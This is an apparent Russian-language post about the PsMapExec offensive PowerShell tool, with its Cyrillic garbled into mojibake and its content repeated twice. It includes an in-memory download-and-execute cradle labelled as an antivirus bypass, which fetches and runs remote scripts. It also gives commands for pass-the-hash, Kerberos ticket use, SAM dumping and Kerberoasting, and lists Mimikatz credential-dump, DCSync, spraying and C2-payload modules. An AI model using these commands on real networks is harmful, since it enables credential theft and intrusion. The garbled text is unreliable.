ΠΠ°ΡΠΈΠ½Π°Ρ Ρ Π²Π΅ΡΡΠΈΠΈ 0.6.0, PsMapExec Π±ΠΎΠ»ΡΡΠ΅ Π½Π΅ ΠΈΠΌΠ΅Π΅Ρ ΠΊΠ°ΠΊΠΈΡ
-Π»ΠΈΠ±ΠΎ Π²Π½Π΅ΡΠ½ΠΈΡ
Π·Π°Π²ΠΈΡΠΈΠΌΠΎΡΡΠ΅ΠΉ, ΠΊΡΠΎΠΌΠ΅ ΠΌΠΎΠ΄ΡΠ»Ρ Amnesiac.
PsMapExec ΡΠ΅ΠΏΠ΅ΡΡ ΠΌΠΎΠΆΠ½ΠΎ Π·Π°ΠΏΡΡΠΊΠ°ΡΡ Π² ΠΎΠ³ΡΠ°Π½ΠΈΡΠ΅Π½Π½ΡΡ
ΡΡΠ΅Π΄Π°Ρ
, ΡΠ°ΠΊΠΈΡ
ΠΊΠ°ΠΊ ΡΠΊΠ·Π°ΠΌΠ΅Π½Π°ΡΠΈΠΎΠ½Π½ΡΠ΅ Π»Π°Π±ΠΎΡΠ°ΡΠΎΡΠΈΠΈ ΠΈΠ»ΠΈ ΠΌΠ°ΡΠΈΠ½Ρ CTF
Π’Π΅ΠΊΡΡΠ°Ρ ΠΏΠΎΠ΄Π΄Π΅ΡΠΆΠΊΠ° ΠΌΠ΅ΡΠΎΠ΄ΠΎΠ² (ΠΏΡΠΎΡΠΎΠΊΠΎΠ»ΠΎΠ²):
Π Π΅Π°Π»ΠΈΠ·ΠΎΠ²Π°Π½Π½ΡΠ΅ ΠΌΠΎΠ΄ΡΠ»ΠΈ:
ΠΠ°Π³ΡΡΠ·ΠΊΠ° ΡΠΊΡΠΈΠΏΡΠ° Π² ΠΏΠ°ΠΌΡΡΡ (AV bypass):
IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/The-Viper-One/PME-Scripts/main/Invoke-NETMongoose.ps1");IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/The-Viper-One/PsMapExec/main/PsMapExec.ps1")
ΠΡΠΈΠΌΠ΅ΡΡ:
# Π’Π΅ΠΊΡΡΠΈΠΉ ΠΏΠΎΠ»ΡΠ·ΠΎΠ²Π°ΡΠ΅Π»Ρ
PsMapExec -Targets All -Method [Method]
# Π‘ ΠΏΠ°ΡΠΎΠ»Π΅ΠΌ
PsMapExec -Targets All -Method [Method] -Username [Username] -Password [Password]
# Π‘ Ρ Π΅ΡΠ΅ΠΌ
PsMapExec -Targets All -Method [Method] -Username [Username] -Hash [RC4/AES256]
# Π‘ Π±ΠΈΠ»Π΅ΡΠΎΠΌ
PsMapExec -Targets All -Method [Method] -Ticket [doI.. OR Path to ticket file]
# ΠΠ°ΠΌΠΏ SAM ΡΠ°ΠΉΠ»Π°
PsMapExec -Targets DC.domain.local -Method SMB -Ticket [Base64-Ticket] -Module SAM
# Kerberoasting
PsMapExec -Method Kerberoast -ShowOutput
# ΠΡΠΏΠΎΠ»ΡΠ·ΠΎΠ²Π°Π½ΠΈΠ΅ ΠΌΠΎΠ΄ΡΠ»Π΅ΠΉ
PsMapExec -Targets All -Method [Method] -Module [Module]
Π’Π΅ΠΊΡΡΠ°Ρ ΠΏΠΎΠ΄Π΄Π΅ΡΠΆΠΊΠ° ΠΌΠ΅ΡΠΎΠ΄ΠΎΠ² (ΠΏΡΠΎΡΠΎΠΊΠΎΠ»ΠΎΠ²):
- RDP
- SessionHunter
- SMB
- SMB Signing
- Spraying
- VNC
- WinRM
- WMI
- MSSQL
- Kerberoast
- Amnesiac - Π²ΡΠΏΠΎΠ»Π½Π΅Π½ΠΈΠ΅ Amnesiac C2 ΠΏΠ΅ΠΉΠ»ΠΎΠ°Π΄ΠΎΠ²
- ConsoleHistory - ΠΈΡΡΠΎΡΠΈΡ Π² PowerShell
- Files - ΡΠ°ΠΉΠ»Ρ Π² ΡΠΈΠΏΠΈΡΠ½ΡΡ Π΄ΠΈΡΠ΅ΠΊΡΠΎΡΠΈΡΡ
- KerbDump - Π΄Π°ΠΌΠΏ Kerberos Π±ΠΈΠ»Π΅ΡΠΎΠ²
- eKeys - Π΄Π°ΠΌΠΏ ΠΊΠ»ΡΡΠ΅ΠΉ (Mimikatz)
- LogonPasswords - Π΄Π°ΠΌΠΏ logon passwords (Mimikatz)
- LSA - Π΄Π°ΠΌΠΏ LSA (Mimikatz)
- NTDS - ΡΠ΅Π°Π»ΠΈΠ·Π°ΡΠΈΡ DCsync
- SAM - Π΄Π°ΠΌΠΏ SAM
ΠΠ°Π³ΡΡΠ·ΠΊΠ° ΡΠΊΡΠΈΠΏΡΠ° Π² ΠΏΠ°ΠΌΡΡΡ (AV bypass):
IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/The-Viper-One/PME-Scripts/main/Invoke-NETMongoose.ps1");IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/The-Viper-One/PsMapExec/main/PsMapExec.ps1")
ΠΡΠΈΠΌΠ΅ΡΡ:
# Π’Π΅ΠΊΡΡΠΈΠΉ ΠΏΠΎΠ»ΡΠ·ΠΎΠ²Π°ΡΠ΅Π»Ρ
PsMapExec -Targets All -Method [Method]
# Π‘ ΠΏΠ°ΡΠΎΠ»Π΅ΠΌ
PsMapExec -Targets All -Method [Method] -Username [Username] -Password [Password]
# Π‘ Ρ Π΅ΡΠ΅ΠΌ
PsMapExec -Targets All -Method [Method] -Username [Username] -Hash [RC4/AES256]
# Π‘ Π±ΠΈΠ»Π΅ΡΠΎΠΌ
PsMapExec -Targets All -Method [Method] -Ticket [doI.. OR Path to ticket file]
# ΠΠ°ΠΌΠΏ SAM ΡΠ°ΠΉΠ»Π°
PsMapExec -Targets DC.domain.local -Method SMB -Ticket [Base64-Ticket] -Module SAM
# Kerberoasting
PsMapExec -Method Kerberoast -ShowOutput
# ΠΡΠΏΠΎΠ»ΡΠ·ΠΎΠ²Π°Π½ΠΈΠ΅ ΠΌΠΎΠ΄ΡΠ»Π΅ΠΉ
PsMapExec -Targets All -Method [Method] -Module [Module]